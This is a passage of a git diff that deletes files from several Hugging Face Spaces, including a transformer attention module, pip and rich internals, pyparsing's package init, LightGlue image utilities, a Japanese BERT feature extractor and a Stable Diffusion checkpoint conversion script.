max_neg_value(dots) - - if exists(mask): - mask = rearrange(mask, 'b j -> b () () j') - dots.masked_fill_(~mask, mask_value) - del mask - - if self.causal: - i, j = dots.shape[-2:] - mask = torch.ones(i, j, device = device).triu_(j - i + 1).bool() - dots.masked_fill_(mask, mask_value) - - attn = softmax(dots, dim=-1) - - out = torch.einsum('b h i j, b h j d -> b h i d', attn, v) - out = rearrange(out, 'b h n d -> b n (h d)') - out = self.to_out(out) - return out - - -# main transformer class -class Transformer(nn.Module): - def __init__( - self, - *, - dim, - depth, - seq_len, - causal = True, - heads = 8, - dim_head = 64, - ff_mult = 4, - attn_dropout = 0., - ff_dropout = 0., - sparse_attn = False, - sandwich_norm = False, - ): - super().__init__() - layers = nn.ModuleList([]) - sparse_layer = cast_tuple(sparse_attn, depth) - - for ind, sparse_attn in zip(range(depth), sparse_layer): - attn = Attention(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout) - - ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout) - - layers.append(nn.ModuleList([ - LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)), - LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm)) - ])) - - execute_type = SequentialSequence - route_attn = ((True, False),) * depth - attn_route_map = {'mask': route_attn} - - self.layers = execute_type(layers, args_route = attn_route_map) - - def forward(self, x, **kwargs): - return self.layers(x, **kwargs) diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/cli/__init__.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/cli/__init__.py deleted file mode 100644 index e589bb917e23823e25f9fff7e0849c4d6d4a62bc..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/cli/__init__.py +++ /dev/null @@ -1,4 +0,0 @@ -"""Subpackage containing all of pip's command line interface related code -""" - -# This file intentionally does not import submodules diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/status.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/status.py deleted file mode 100644 index 09eff405ec194ee2884f203cb48c5df54ff0b9c7..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/rich/status.py +++ /dev/null @@ -1,132 +0,0 @@ -from types import TracebackType -from typing import Optional, Type - -from .console import Console, RenderableType -from .jupyter import JupyterMixin -from .live import Live -from .spinner import Spinner -from .style import StyleType - - -class Status(JupyterMixin): - """Displays a status indicator with a 'spinner' animation. - - Args: - status (RenderableType): A status renderable (str or Text typically). - console (Console, optional): Console instance to use, or None for global console. Defaults to None. - spinner (str, optional): Name of spinner animation (see python -m rich.spinner). Defaults to "dots". - spinner_style (StyleType, optional): Style of spinner. Defaults to "status.spinner". - speed (float, optional): Speed factor for spinner animation. Defaults to 1.0. - refresh_per_second (float, optional): Number of refreshes per second. Defaults to 12.5. - """ - - def __init__( - self, - status: RenderableType, - *, - console: Optional[Console] = None, - spinner: str = "dots", - spinner_style: StyleType = "status.spinner", - speed: float = 1.0, - refresh_per_second: float = 12.5, - ): - self.status = status - self.spinner_style = spinner_style - self.speed = speed - self._spinner = Spinner(spinner, text=status, style=spinner_style, speed=speed) - self._live = Live( - self.renderable, - console=console, - refresh_per_second=refresh_per_second, - transient=True, - ) - - @property - def renderable(self) -> Spinner: - return self._spinner - - @property - def console(self) -> "Console": - """Get the Console used by the Status objects.""" - return self._live.console - - def update( - self, - status: Optional[RenderableType] = None, - *, - spinner: Optional[str] = None, - spinner_style: Optional[StyleType] = None, - speed: Optional[float] = None, - ) -> None: - """Update status. - - Args: - status (Optional[RenderableType], optional): New status renderable or None for no change. Defaults to None. - spinner (Optional[str], optional): New spinner or None for no change. Defaults to None. - spinner_style (Optional[StyleType], optional): New spinner style or None for no change. Defaults to None. - speed (Optional[float], optional): Speed factor for spinner animation or None for no change. Defaults to None. - """ - if status is not None: - self.status = status - if spinner_style is not None: - self.spinner_style = spinner_style - if speed is not None: - self.speed = speed - if spinner is not None: - self._spinner = Spinner( - spinner, text=self.status, style=self.spinner_style, speed=self.speed - ) - self._live.update(self.renderable, refresh=True) - else: - self._spinner.update( - text=self.status, style=self.spinner_style, speed=self.speed - ) - - def start(self) -> None: - """Start the status animation.""" - self._live.start() - - def stop(self) -> None: - """Stop the spinner animation.""" - self._live.stop() - - def __rich__(self) -> RenderableType: - return self.renderable - - def __enter__(self) -> "Status": - self.start() - return self - - def __exit__( - self, - exc_type: Optional[Type[BaseException]], - exc_val: Optional[BaseException], - exc_tb: Optional[TracebackType], - ) -> None: - self.stop() - - -if __name__ == "__main__": # pragma: no cover - - from time import sleep - - from .console import Console - - console = Console() - with console.status("[magenta]Covid detector booting up") as status: - sleep(3) - console.log("Importing advanced AI") - sleep(3) - console.log("Advanced Covid AI Ready") - sleep(3) - status.update(status="[bold blue] Scanning for Covid", spinner="earth") - sleep(3) - console.log("Found 10,000,000,000 copies of Covid32.exe") - sleep(3) - status.update( - status="[bold red]Moving Covid32.exe to Trash", - spinner="bouncingBall", - spinner_style="yellow", - ) - sleep(5) - console.print("[bold green]Covid deleted successfully") diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/__init__.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/__init__.py deleted file mode 100644 index 7802ff158d83eb88e6dbe78d9cd33ca14341662a..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pkg_resources/_vendor/pyparsing/__init__.py +++ /dev/null @@ -1,331 +0,0 @@ -# module pyparsing.py -# -# Copyright (c) 2003-2022 Paul T. McGuire -# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -# - -__doc__ = """ -pyparsing module - Classes and methods to define and execute parsing grammars -============================================================================= - -The pyparsing module is an alternative approach to creating and -executing simple grammars, vs. the traditional lex/yacc approach, or the -use of regular expressions. With pyparsing, you don't need to learn -a new syntax for defining grammars or matching expressions - the parsing -module provides a library of classes that you use to construct the -grammar directly in Python. - -Here is a program to parse "Hello, World!" (or any greeting of the form -``", !"``), built up using :class:`Word`, -:class:`Literal`, and :class:`And` elements -(the :meth:`'+'` operators create :class:`And` expressions, -and the strings are auto-converted to :class:`Literal` expressions):: - - from pyparsing import Word, alphas - - # define grammar of a greeting - greet = Word(alphas) + "," + Word(alphas) + "!" - - hello = "Hello, World!" - print(hello, "->", greet.parse_string(hello)) - -The program outputs the following:: - - Hello, World! -> ['Hello', ',', 'World', '!'] - -The Python representation of the grammar is quite readable, owing to the -self-explanatory class names, and the use of :class:`'+'`, -:class:`'|'`, :class:`'^'` and :class:`'&'` operators. - -The :class:`ParseResults` object returned from -:class:`ParserElement.parseString` can be -accessed as a nested list, a dictionary, or an object with named -attributes. - -The pyparsing module handles some of the problems that are typically -vexing when writing text parsers: - - - extra or missing whitespace (the above program will also handle - "Hello,World!", "Hello , World !", etc.) - - quoted strings - - embedded comments - - -Getting Started - ------------------ -Visit the classes :class:`ParserElement` and :class:`ParseResults` to -see the base classes that most other pyparsing -classes inherit from. Use the docstrings for examples of how to: - - - construct literal match expressions from :class:`Literal` and - :class:`CaselessLiteral` classes - - construct character word-group expressions using the :class:`Word` - class - - see how to create repetitive expressions using :class:`ZeroOrMore` - and :class:`OneOrMore` classes - - use :class:`'+'`, :class:`'|'`, :class:`'^'`, - and :class:`'&'` operators to combine simple expressions into - more complex ones - - associate names with your parsed results using - :class:`ParserElement.setResultsName` - - access the parsed data, which is returned as a :class:`ParseResults` - object - - find some helpful expression short-cuts like :class:`delimitedList` - and :class:`oneOf` - - find more useful common expressions in the :class:`pyparsing_common` - namespace class -""" -from typing import NamedTuple - - -class version_info(NamedTuple): - major: int - minor: int - micro: int - releaselevel: str - serial: int - - @property - def __version__(self): - return ( - "{}.{}.{}".format(self.major, self.minor, self.micro) - + ( - "{}{}{}".format( - "r" if self.releaselevel[0] == "c" else "", - self.releaselevel[0], - self.serial, - ), - "", - )[self.releaselevel == "final"] - ) - - def __str__(self): - return "{} {} / {}".format(__name__, self.__version__, __version_time__) - - def __repr__(self): - return "{}.{}({})".format( - __name__, - type(self).__name__, - ", ".join("{}={!r}".format(*nv) for nv in zip(self._fields, self)), - ) - - -__version_info__ = version_info(3, 0, 9, "final", 0) -__version_time__ = "05 May 2022 07:02 UTC" -__version__ = __version_info__.__version__ -__versionTime__ = __version_time__ -__author__ = "Paul McGuire " - -from .util import * -from .exceptions import * -from .actions import * -from .core import __diag__, __compat__ -from .results import * -from .core import * -from .core import _builtin_exprs as core_builtin_exprs -from .helpers import * -from .helpers import _builtin_exprs as helper_builtin_exprs - -from .unicode import unicode_set, UnicodeRangeList, pyparsing_unicode as unicode -from .testing import pyparsing_test as testing -from .common import ( - pyparsing_common as common, - _builtin_exprs as common_builtin_exprs, -) - -# define backward compat synonyms -if "pyparsing_unicode" not in globals(): - pyparsing_unicode = unicode -if "pyparsing_common" not in globals(): - pyparsing_common = common -if "pyparsing_test" not in globals(): - pyparsing_test = testing - -core_builtin_exprs += common_builtin_exprs + helper_builtin_exprs - - -__all__ = [ - "__version__", - "__version_time__", - "__author__", - "__compat__", - "__diag__", - "And", - "AtLineStart", - "AtStringStart", - "CaselessKeyword", - "CaselessLiteral", - "CharsNotIn", - "Combine", - "Dict", - "Each", - "Empty", - "FollowedBy", - "Forward", - "GoToColumn", - "Group", - "IndentedBlock", - "Keyword", - "LineEnd", - "LineStart", - "Literal", - "Located", - "PrecededBy", - "MatchFirst", - "NoMatch", - "NotAny", - "OneOrMore", - "OnlyOnce", - "OpAssoc", - "Opt", - "Optional", - "Or", - "ParseBaseException", - "ParseElementEnhance", - "ParseException", - "ParseExpression", - "ParseFatalException", - "ParseResults", - "ParseSyntaxException", - "ParserElement", - "PositionToken", - "QuotedString", - "RecursiveGrammarException", - "Regex", - "SkipTo", - "StringEnd", - "StringStart", - "Suppress", - "Token", - "TokenConverter", - "White", - "Word", - "WordEnd", - "WordStart", - "ZeroOrMore", - "Char", - "alphanums", - "alphas", - "alphas8bit", - "any_close_tag", - "any_open_tag", - "c_style_comment", - "col", - "common_html_entity", - "counted_array", - "cpp_style_comment", - "dbl_quoted_string", - "dbl_slash_comment", - "delimited_list", - "dict_of", - "empty", - "hexnums", - "html_comment", - "identchars", - "identbodychars", - "java_style_comment", - "line", - "line_end", - "line_start", - "lineno", - "make_html_tags", - "make_xml_tags", - "match_only_at_col", - "match_previous_expr", - "match_previous_literal", - "nested_expr", - "null_debug_action", - "nums", - "one_of", - "printables", - "punc8bit", - "python_style_comment", - "quoted_string", - "remove_quotes", - "replace_with", - "replace_html_entity", - "rest_of_line", - "sgl_quoted_string", - "srange", - "string_end", - "string_start", - "trace_parse_action", - "unicode_string", - "with_attribute", - "indentedBlock", - "original_text_for", - "ungroup", - "infix_notation", - "locatedExpr", - "with_class", - "CloseMatch", - "token_map", - "pyparsing_common", - "pyparsing_unicode", - "unicode_set", - "condition_as_parse_action", - "pyparsing_test", - # pre-PEP8 compatibility names - "__versionTime__", - "anyCloseTag", - "anyOpenTag", - "cStyleComment", - "commonHTMLEntity", - "countedArray", - "cppStyleComment", - "dblQuotedString", - "dblSlashComment", - "delimitedList", - "dictOf", - "htmlComment", - "javaStyleComment", - "lineEnd", - "lineStart", - "makeHTMLTags", - "makeXMLTags", - "matchOnlyAtCol", - "matchPreviousExpr", - "matchPreviousLiteral", - "nestedExpr", - "nullDebugAction", - "oneOf", - "opAssoc", - "pythonStyleComment", - "quotedString", - "removeQuotes", - "replaceHTMLEntity", - "replaceWith", - "restOfLine", - "sglQuotedString", - "stringEnd", - "stringStart", - "traceParseAction", - "unicodeString", - "withAttribute", - "indentedBlock", - "originalTextFor", - "infixNotation", - "locatedExpr", - "withClass", - "tokenMap", - "conditionAsParseAction", - "autoname_elements", -] diff --git a/spaces/Rayzggz/illi-Bert-VITS2/text/japanese_bert.py b/spaces/Rayzggz/illi-Bert-VITS2/text/japanese_bert.py deleted file mode 100644 index 5dd196483da4355746383253879190ce538b9df9..0000000000000000000000000000000000000000 --- a/spaces/Rayzggz/illi-Bert-VITS2/text/japanese_bert.py +++ /dev/null @@ -1,38 +0,0 @@ -import torch -from transformers import AutoTokenizer, AutoModelForMaskedLM -import sys - -tokenizer = AutoTokenizer.from_pretrained("./bert/bert-base-japanese-v3") - -models = dict() - - -def get_bert_feature(text, word2ph, device=None): - if ( - sys.platform == "darwin" - and torch.backends.mps.is_available() - and device == "cpu" - ): - device = "mps" - if not device: - device = "cuda" - if device not in models.keys(): - models[device] = AutoModelForMaskedLM.from_pretrained( - "./bert/bert-base-japanese-v3" - ).to(device) - with torch.no_grad(): - inputs = tokenizer(text, return_tensors="pt") - for i in inputs: - inputs[i] = inputs[i].to(device) - res = models[device](**inputs, output_hidden_states=True) - res = torch.cat(res["hidden_states"][-3:-2], -1)[0].cpu() - assert inputs["input_ids"].shape[-1] == len(word2ph) - word2phone = word2ph - phone_level_feature = [] - for i in range(len(word2phone)): - repeat_feature = res[i].repeat(word2phone[i], 1) - phone_level_feature.append(repeat_feature) - - phone_level_feature = torch.cat(phone_level_feature, dim=0) - - return phone_level_feature.T diff --git a/spaces/Realcat/image-matching-webui/third_party/LightGlue/lightglue/utils.py b/spaces/Realcat/image-matching-webui/third_party/LightGlue/lightglue/utils.py deleted file mode 100644 index e8d30803931aad89e16e9b543959f76fda87389e..0000000000000000000000000000000000000000 --- a/spaces/Realcat/image-matching-webui/third_party/LightGlue/lightglue/utils.py +++ /dev/null @@ -1,150 +0,0 @@ -from pathlib import Path -import torch -import kornia -import cv2 -import numpy as np -from typing import Union, List, Optional, Callable, Tuple -import collections.abc as collections -from types import SimpleNamespace - - -class ImagePreprocessor: - default_conf = { - "resize": None, # target edge length, None for no resizing - "side": "long", - "interpolation": "bilinear", - "align_corners": None, - "antialias": True, - "grayscale": False, # convert rgb to grayscale - } - - def __init__(self, **conf) -> None: - super().__init__() - self.conf = {**self.default_conf, **conf} - self.conf = SimpleNamespace(**self.conf) - - def __call__(self, img: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: - """Resize and preprocess an image, return image and resize scale""" - h, w = img.shape[-2:] - if self.conf.resize is not None: - img = kornia.geometry.transform.resize( - img, - self.conf.resize, - side=self.conf.side, - antialias=self.conf.antialias, - align_corners=self.conf.align_corners, - ) - scale = torch.Tensor([img.shape[-1] / w, img.shape[-2] / h]).to(img) - if self.conf.grayscale and img.shape[-3] == 3: - img = kornia.color.rgb_to_grayscale(img) - elif not self.conf.grayscale and img.shape[-3] == 1: - img = kornia.color.grayscale_to_rgb(img) - return img, scale - - -def map_tensor(input_, func: Callable): - string_classes = (str, bytes) - if isinstance(input_, string_classes): - return input_ - elif isinstance(input_, collections.Mapping): - return {k: map_tensor(sample, func) for k, sample in input_.items()} - elif isinstance(input_, collections.Sequence): - return [map_tensor(sample, func) for sample in input_] - elif isinstance(input_, torch.Tensor): - return func(input_) - else: - return input_ - - -def batch_to_device(batch: dict, device: str = "cpu", non_blocking: bool = True): - """Move batch (dict) to device""" - - def _func(tensor): - return tensor.to(device=device, non_blocking=non_blocking).detach() - - return map_tensor(batch, _func) - - -def rbd(data: dict) -> dict: - """Remove batch dimension from elements in data""" - return { - k: v[0] if isinstance(v, (torch.Tensor, np.ndarray, list)) else v - for k, v in data.items() - } - - -def read_image(path: Path, grayscale: bool = False) -> np.ndarray: - """Read an image from path as RGB or grayscale""" - if not Path(path).exists(): - raise FileNotFoundError(f"No image at path {path}.") - mode = cv2.IMREAD_GRAYSCALE if grayscale else cv2.IMREAD_COLOR - image = cv2.imread(str(path), mode) - if image is None: - raise IOError(f"Could not read image at {path}.") - if not grayscale: - image = image[..., ::-1] - return image - - -def numpy_image_to_torch(image: np.ndarray) -> torch.Tensor: - """Normalize the image tensor and reorder the dimensions.""" - if image.ndim == 3: - image = image.transpose((2, 0, 1)) # HxWxC to CxHxW - elif image.ndim == 2: - image = image[None] # add channel axis - else: - raise ValueError(f"Not an image: {image.shape}") - return torch.tensor(image / 255.0, dtype=torch.float) - - -def resize_image( - image: np.ndarray, - size: Union[List[int], int], - fn: str = "max", - interp: Optional[str] = "area", -) -> np.ndarray: - """Resize an image to a fixed size, or according to max or min edge.""" - h, w = image.shape[:2] - - fn = {"max": max, "min": min}[fn] - if isinstance(size, int): - scale = size / fn(h, w) - h_new, w_new = int(round(h * scale)), int(round(w * scale)) - scale = (w_new / w, h_new / h) - elif isinstance(size, (tuple, list)): - h_new, w_new = size - scale = (w_new / w, h_new / h) - else: - raise ValueError(f"Incorrect new size: {size}") - mode = { - "linear": cv2.INTER_LINEAR, - "cubic": cv2.INTER_CUBIC, - "nearest": cv2.INTER_NEAREST, - "area": cv2.INTER_AREA, - }[interp] - return cv2.resize(image, (w_new, h_new), interpolation=mode), scale - - -def load_image(path: Path, resize: int = None, **kwargs) -> torch.Tensor: - image = read_image(path) - if resize is not None: - image, _ = resize_image(image, resize, **kwargs) - return numpy_image_to_torch(image) - - -def match_pair( - extractor, - matcher, - image0: torch.Tensor, - image1: torch.Tensor, - device: str = "cpu", - **preprocess, -): - """Match a pair of images (image0, image1) with an extractor and matcher""" - feats0 = extractor.extract(image0, **preprocess) - feats1 = extractor.extract(image1, **preprocess) - matches01 = matcher({"image0": feats0, "image1": feats1}) - data = [feats0, feats1, matches01] - # remove batch dim and move to target device - feats0, feats1, matches01 = [batch_to_device(rbd(x), device) for x in data] - return feats0, feats1, matches01 diff --git a/spaces/Red54/convert-sd-ckpt/convert.py b/spaces/Red54/convert-sd-ckpt/convert.py deleted file mode 100644 index b1e7841c102e3b763d13aa9b8996efd405956c6e..0000000000000000000000000000000000000000 --- a/spaces/Red54/convert-sd-ckpt/convert.py +++ /dev/null @@ -1,878 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" Conversion script for the Stable Diffusion checkpoints. """ - -import torch - -try: - from omegaconf import OmegaConf -except ImportError: - raise ImportError( - "OmegaConf is required to convert the LDM checkpoints. Please install it with `pip install OmegaConf`." - ) - -from diffusers import (AutoencoderKL, DDIMScheduler, - EulerAncestralDiscreteScheduler, EulerDiscreteScheduler, - LMSDiscreteScheduler, PNDMScheduler, - StableDiffusionPipeline, UNet2DConditionModel) -from diffusers.pipelines.latent_diffusion.pipeline_latent_diffusion import ( - LDMBertConfig, LDMBertModel) -from diffusers.pipelines.stable_diffusion import StableDiffusionSafetyChecker -from transformers import AutoFeatureExtractor, CLIPTextModel, CLIPTokenizer - - -def shave_segments(path, n_shave_prefix_segments=1): - """ - Removes segments. Positive values shave the first segments, negative shave the last segments. - """ - if n_shave_prefix_segments >= 0: - return ".".join(path.split(".")[n_shave_prefix_segments:]) - else: - return ".".join(path.split(".")[:n_shave_prefix_segments]) - - -def renew_resnet_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside resnets to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item.replace("in_layers.0", "norm1") - new_item = new_item.replace("in_layers.2", "conv1") - - new_item = new_item.replace("out_layers.0", "norm2") - new_item = new_item.replace("out_layers.3", "conv2") - - new_item = new_item.replace("emb_layers.1", "time_emb_proj") - new_item = new_item.replace("skip_connection", "conv_shortcut") - - new_item = shave_segments( - new_item, n_shave_prefix_segments=n_shave_prefix_segments - ) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - - -def renew_vae_resnet_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside resnets to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item - - new_item = new_item.replace("nin_shortcut", "conv_shortcut") - new_item = shave_segments( - new_item, n_shave_prefix_segments=n_shave_prefix_segments - ) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - - -def renew_attention_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside attentions to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item - - # new_item = new_item.replace('norm.weight', 'group_norm.weight') - # new_item = new_item.replace('norm.bias', 'group_norm.bias') - - # new_item = new_item.replace('proj_out.weight', 'proj_attn.weight') - # new_item = new_item.replace('proj_out.bias', 'proj_attn.bias') - - # new_item = shave_segments(new_item, n_shave_prefix_segments=n_shave_prefix_segments) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - - -def renew_vae_attention_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside attentions to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item - - new_item = new_item.replace("norm.weight", "group_norm.weight") - new_item = new_item.replace("norm.bias", "group_norm.bias") - - new_item = new_item.replace("q.weight", "query.weight") - new_item = new_item.replace("q.bias", "query.bias") - - new_item = new_item.replace("k.weight", "key.weight") - new_item = new_item.replace("k.bias", "key.bias") - - new_item = new_item.replace("v.weight", "value.weight") - new_item = new_item.replace("v.bias", "value.bias") - - new_item = new_item.replace("proj_out.weight", "proj_attn.weight") - new_item = new_item.replace("proj_out.bias", "proj_attn.bias") - - new_item = shave_segments( - new_item, n_shave_prefix_segments=n_shave_prefix_segments - ) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - - -def assign_to_checkpoint( - paths, - checkpoint, - old_checkpoint, - attention_paths_to_split=None, - additional_replacements=None, - config=None, -): - """ - This does the final conversion step: take locally converted weights and apply a global renaming - to them. It splits attention layers, and takes into account additional replacements - that may arise. - Assigns the weights to the new checkpoint. - """ - assert isinstance( - paths, list - ), "Paths should be a list of dicts containing 'old' and 'new' keys." - - # Splits the attention layers into three variables. - if attention_paths_to_split is not None: - for path, path_map in attention_paths_to_split.items(): - old_tensor = old_checkpoint[path] - channels = old_tensor.shape[0] // 3 - - target_shape = (-1, channels) if len(old_tensor.shape) == 3 else (-1) - - num_heads = old_tensor.shape[0] // config["num_head_channels"] // 3 - - old_tensor = old_tensor.reshape( - (num_heads, 3 * channels // num_heads) + old_tensor.shape[1:] - ) - query, key, value = old_tensor.split(channels // num_heads, dim=1) - - checkpoint[path_map["query"]] = query.reshape(target_shape) - checkpoint[path_map["key"]] = key.reshape(target_shape) - checkpoint[path_map["value"]] = value.reshape(target_shape) - - for path in paths: - new_path = path["new"] - - # These have already been assigned - if ( - attention_paths_to_split is not None - and new_path in attention_paths_to_split - ): - continue - - # Global renaming happens here - new_path = new_path.replace("middle_block.0", "mid_block.resnets.0") - new_path = new_path.replace("middle_block.1", "mid_block.attentions.0") - new_path = new_path.replace("middle_block.2", "mid_block.resnets.1") - - if additional_replacements is not None: - for replacement in additional_replacements: - new_path = new_path.replace(replacement["old"], replacement["new"]) - - # proj_attn.weight has to be converted from conv 1D to linear - if "proj_attn.weight" in new_path: - checkpoint[new_path] = old_checkpoint[path["old"]][:, :, 0] - else: - checkpoint[new_path] = old_checkpoint[path["old"]] - - -def conv_attn_to_linear(checkpoint): - keys = list(checkpoint.keys()) - attn_keys = ["query.weight", "key.weight", "value.weight"] - for key in keys: - if ".".join(key.split(".")[-2:]) in attn_keys: - if checkpoint[key].ndim > 2: - checkpoint[key] = checkpoint[key][:, :, 0, 0] - elif "proj_attn.weight" in key: - if checkpoint[key].ndim > 2: - checkpoint[key] = checkpoint[key][:, :, 0] - - -def create_unet_diffusers_config(original_config): - """ - Creates a config for the diffusers based on the config of the LDM model. - """ - unet_params = original_config.model.params.unet_config.params - - block_out_channels = [ - unet_params.model_channels * mult for mult in unet_params.channel_mult - ] - - down_block_types = [] - resolution = 1 - for i in range(len(block_out_channels)): - block_type = ( - "CrossAttnDownBlock2D" - if resolution in unet_params.attention_resolutions - else "DownBlock2D" - ) - down_block_types.append(block_type) - if i != len(block_out_channels) - 1: - resolution *= 2 - - up_block_types = [] - for i in range(len(block_out_channels)): - block_type = ( - "CrossAttnUpBlock2D" - if resolution in unet_params.attention_resolutions - else "UpBlock2D" - ) - up_block_types.append(block_type) - resolution //= 2 - - config = dict( - sample_size=unet_params.image_size, - in_channels=unet_params.in_channels, - out_channels=unet_params.out_channels, - down_block_types=tuple(down_block_types), - up_block_types=tuple(up_block_types), - block_out_channels=tuple(block_out_channels), - layers_per_block=unet_params.num_res_blocks, - cross_attention_dim=unet_params.context_dim, - attention_head_dim=unet_params.num_heads, - ) - - return config - - -def create_vae_diffusers_config(original_config): - """ - Creates a config for the diffusers based on the config of the LDM model. - """ - vae_params = original_config.model.params.first_stage_config.params.ddconfig - _ = original_config.model.params.first_stage_config.params.embed_dim - - block_out_channels = [vae_params.ch * mult for mult in vae_params.ch_mult] - down_block_types = ["DownEncoderBlock2D"] * len(block_out_channels) - up_block_types = ["UpDecoderBlock2D"] * len(block_out_channels) - - config = dict( - sample_size=vae_params.resolution, - in_channels=vae_params.in_channels, - out_channels=vae_params.out_ch, - down_block_types=tuple(down_block_types), - up_block_types=tuple(up_block_types), - block_out_channels=tuple(block_out_channels), - latent_channels=vae_params.z_channels, - layers_per_block=vae_params.num_res_blocks, - ) - return config - - -def create_diffusers_schedular(original_config): - schedular = DDIMScheduler( - num_train_timesteps=original_config.model.params.timesteps, - beta_start=original_config.model.params.linear_start, - beta_end=original_config.model.params.linear_end, - beta_schedule="scaled_linear", - ) - return schedular - - -def create_ldm_bert_config(original_config): - bert_params = original_config.model.parms.cond_stage_config.params - config = LDMBertConfig( - d_model=bert_params.n_embed, - encoder_layers=bert_params.n_layer, - encoder_ffn_dim=bert_params.n_embed * 4, - ) - return config - - -def convert_ldm_unet_checkpoint(checkpoint, config, extract_ema=False): - """ - Takes a state dict and a config, and returns a converted checkpoint. - """ - - # extract state_dict for UNet - unet_state_dict = {} - keys = list(checkpoint.keys()) - - unet_key = "model.diffusion_model." - # at least a 100 parameters have to start with `model_ema` in order for the checkpoint to be EMA - if sum(k.startswith("model_ema") for k in keys) > 100: - print(f"Checkpoint has both EMA and non-EMA weights.") - if extract_ema: - print( - "In this conversion only the EMA weights are extracted. If you want to instead extract the non-EMA" - " weights (useful to continue fine-tuning), please make sure to remove the `--extract_ema` flag." - ) - for key in keys: - if key.startswith("model.diffusion_model"): - flat_ema_key = "model_ema." + "".join(key.split(".")[1:]) - unet_state_dict[key.replace(unet_key, "")] = checkpoint.pop( - flat_ema_key - ) - else: - print( - "In this conversion only the non-EMA weights are extracted. If you want to instead extract the EMA" - " weights (usually better for inference), please make sure to add the `--extract_ema` flag." - ) - - for key in keys: - if key.startswith(unet_key): - unet_state_dict[key.replace(unet_key, "")] = checkpoint.pop(key) - - new_checkpoint = {} - - new_checkpoint["time_embedding.linear_1.weight"] = unet_state_dict[ - "time_embed.0.weight" - ] - new_checkpoint["time_embedding.linear_1.bias"] = unet_state_dict[ - "time_embed.0.bias" - ] - new_checkpoint["time_embedding.linear_2.weight"] = unet_state_dict[ - "time_embed.2.weight" - ] - new_checkpoint["time_embedding.linear_2.bias"] = unet_state_dict[ - "time_embed.2.bias" - ] - - new_checkpoint["conv_in.weight"] = unet_state_dict["input_blocks.0.0.weight"] - new_checkpoint["conv_in.bias"] = unet_state_dict["input_blocks.0.0.bias"] - - new_checkpoint["conv_norm_out.weight"] = unet_state_dict["out.0.weight"] - new_checkpoint["conv_norm_out.bias"] = unet_state_dict["out.0.bias"] - new_checkpoint["conv_out.weight"] = unet_state_dict["out.2.weight"] - new_checkpoint["conv_out.bias"] = unet_state_dict["out.2.bias"] - - # Retrieves the keys for the input blocks only - num_input_blocks = len( - { - ".".join(layer.split(".")[:2]) - for layer in unet_state_dict - if "input_blocks" in layer - } - ) - input_blocks = { - layer_id: [key for key in unet_state_dict if f"input_blocks.{layer_id}" in key] - for layer_id in range(num_input_blocks) - } - - # Retrieves the keys for the middle blocks only - num_middle_blocks = len( - { - ".".join(layer.split(".")[:2]) - for layer in unet_state_dict - if "middle_block" in layer - } - ) - middle_blocks = { - layer_id: [key for key in unet_state_dict if f"middle_block.{layer_id}" in key] - for layer_id in range(num_middle_blocks) - } - - # Retrieves the keys for the output blocks only - num_output_blocks = len( - { - ".".join(layer.split(".")[:2]) - for layer in unet_state_dict - if "output_blocks" in layer - } - ) - output_blocks = { - layer_id: [key for key in unet_state_dict if f"output_blocks.{layer_id}" in key] - for layer_id in range(num_output_blocks) - } - - for i in range(1, num_input_blocks): - block_id = (i - 1) // 